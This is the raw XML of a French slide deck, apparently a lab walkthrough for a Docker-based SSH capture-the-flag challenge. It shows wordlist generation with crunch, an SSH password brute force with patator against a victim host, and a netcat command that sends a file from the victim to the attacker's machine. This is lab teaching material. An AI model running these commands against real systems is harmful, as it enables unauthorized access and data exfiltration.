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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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2a2794e9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Secure Shell Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>(SSH Challenge)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Méthode de résolution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Création d’une liste de combinaisons avec Crunch</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="Google Shape;116;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743075" y="1381125"/>
            <a:ext cx="5657850" cy="238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BruteForce du mot de passe SSH avec Patator</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Ensuite, l’outil Patator va nous aider à trouver exactement le mot de passe SSH de la machine de la victime en utilisant la liste de combinaisons que nous avons créée avec Crunch plus tôt. Pour cela, on entre la commande suivante: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>patator ssh_login host=[victime_ip] user=user password=FILE0 0=mylist.txt -x ignore:mesg='Authentication failed.'</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fr"/>
              <a:t>Ensuite, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>attend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> que Patator nous affiche le mot de passe. Cette étape peut prendre plusieurs minutes.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BruteForce du mot de passe SSH avec Patator</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1225438"/>
            <a:ext cx="8839201" cy="26926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Connexion à la machine de la victime avec SSH</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Maintenant que nous avons trouvé le mot de passe de la machine de la victime, avec un des deux terminaux, nous pouvons nous y connecter simplement en utilisant l’outil SSH: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh user@[victime_ip]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Et saisir le mot de passe trouvé quand il sera demandé.</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Connexion à la machine de la victime avec SSH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Google Shape;140;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533525" y="1146588"/>
            <a:ext cx="6076950" cy="341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Netcat pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>transférer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> des fichiers</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Une fois sur la machine de la victime, nous allons installer l’outil Netcat afin de pouvoir transférer des fichiers sur notre machine (la machine de l’attaquant). Pour se faire, entrer la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo apt install netcat-traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>. Le mot de passe du Super User de la machine de la victime est celui qui a été trouvé à l’aide de Patator!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352675" y="3150188"/>
            <a:ext cx="4438650" cy="86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Netcat pour transférer des fichiers</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Sur le deuxième terminal de l’attaquant (celui qui n’est pas connecté en SSH)  nous allons ouvrir un port sur lequel nous allons “écouter” ce qui va passer au travers à l’aide de Netcat. Pour cela, il faut entrer la commande suivante: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>netcat -l -p [port_number] &gt; [file_name.sh]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>port_number correspond à la valeur du port que nous allons utiliser, file_name correspond au nom du fichier dans lequel nous voulons stocker ce qui sera envoyé à travers le port. Notez que le fichier de stockage doit être un .sh</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Après avoir appuyé sur “Entrer”, retournez sur le terminal précédent.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Google Shape;154;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2716913" y="4057900"/>
            <a:ext cx="3710175" cy="696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Netcat pour transférer des fichiers</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Sur le terminal connecté en SSH cette fois-ci, entrer la commande suivante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>pour envoyer le fichier désiré dans la machine de l'attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>netcat -w 3 [your_ip] [port_number] &lt; [FileToSend]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>“-w 3” permet de couper la connexion après trois secondes. La valeur de port_number doit être la même que celle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>choisie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> à l’étape précédente. FileToSend correspond au fichier à envoyer.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;161;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553125" y="3545325"/>
            <a:ext cx="6157575" cy="881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Netcat pour transférer des fichiers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Vous remarquerez que sur le deuxième terminal de l’attaquant (celui qui n’est pas connecté en SSH), la connexion Netcat se coupera au même moment que l’envoi du fichier sera terminé. Avec la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>, on peut voir que le fichier a bien été transféré.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2262175" y="2776375"/>
            <a:ext cx="4619625" cy="146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Dernière étape</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Le fichier reçu étant un .sh, il contient donc un script pouvant être exécuté. Pour cela, nous devons d’abord le rendre exécutable en utilisant la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod +x [file_name]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>, puis nous pourrons l’exécuter en entrant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>./[file_name]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> dans le terminal.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2748225" y="2733674"/>
            <a:ext cx="3647550" cy="153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docker-compose up</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Dans un premier temps, nous devons utiliser la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker-compose up - d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> dans un terminal placé dans le bon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>répertoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> pour build les deux machines attaquante et victime.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Cette étape peut prendre plusieurs minutes. Une fois terminé, vous devez avoir les deux messages suivants, confirmant que tout s’est bien passé.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Google Shape;62;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069375" y="2426299"/>
            <a:ext cx="5005249" cy="446525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Google Shape;63;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788025" y="4036200"/>
            <a:ext cx="3567950" cy="727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Conclusion</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Appuyez sur “Entrer” pour exécuter le fichier. Le fichier contient un script qui fera naviguer le terminal à travers plusieurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>dossiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> afin de trouver le fichier flag.txt (qui contient le flag du challenge), et va l’afficher.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Google Shape;182;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681163" y="2571750"/>
            <a:ext cx="5781675" cy="171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Machine de la victime</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Une fois l’étape précédente terminée, nous devons nous connecter aux différentes machines. Pour accéder à la machine de la victime, il suffira d’ouvrir un terminal dans le bon répertoire et d’entrer la commande: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker exec -it server bash</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276475" y="2937738"/>
            <a:ext cx="4591050" cy="63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Machines de l’attaquant</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Dans ce challenge, l’attaquant aura besoin de deux machines (soit deux terminaux). De la même façon que pour la machine de la victime, il faudra ouvrir les deux terminaux dans le bon répertoire et entrer la commande suivante dans chacun d’entre eux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker exec -it kali bash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487775" y="2892275"/>
            <a:ext cx="8168449" cy="83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Installation des outils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machine attaquante a besoin de plusieurs outils afin de compléter ce challenge. Ces outils sont Patator, Secure Shell (SSH) et Netcat. Pour les installer, il suffit d’entrer les commandes suivantes:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>(sudo) apt install patator</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>(sudo) apt install ssh</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>(sudo) apt install netcat-traditional</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Ces étapes peuvent prendre plusieurs minutes.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Installation des outils</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89" name="Google Shape;89;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="2800350" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Google Shape;90;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2132150"/>
            <a:ext cx="2638425" cy="847725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Google Shape;91;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105150" y="1170125"/>
            <a:ext cx="2743200" cy="80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Détection de l’adresse IP de la victime</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Avant toute chose, nous devons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>connaître</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> l’adresse de la victime, mais aussi notre adresse IP (celle de la machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>de l'attaquant).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> Pour trouver l’adresse IP de la victime, il nous suffit d’entrer la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dig server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> dans un des deux terminaux de l’attaquant (“server” étant le nom de la machine de la victime).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Et pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>connaître</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> sa propre adresse IP, il faut entrer la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> dans le terminal de la machine dont on veut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>connaître</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> l’IP.</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Détection des adresses IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1071563"/>
            <a:ext cx="5334000" cy="3000375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Google Shape;104;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5798100" y="1170125"/>
            <a:ext cx="2124075" cy="72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Création d’une liste de combinaisons avec Crunch</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Maintenant, nous allons utiliser l’outil Crunch afin de générer des combinaisons de lettres qui vont nous permettre de trouver le mot de passe SSH de la machine de la victime, ce qui nous permettra de nous y connecter. Pour se faire, il faut entrer la commande suivante dans l’un des deux terminaux de l’attaquant: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>crunch 4 4 abcdefghijklmnopqrstuvwxyz -o mylist.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Ce qui va générer un fichier .txt contenant toutes les combinaisons possibles de 4 caractères en utilisant toutes les lettres de l’alphabet. Ici, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>restreint les combinaisons à 4 caractères afin de faciliter la tâche.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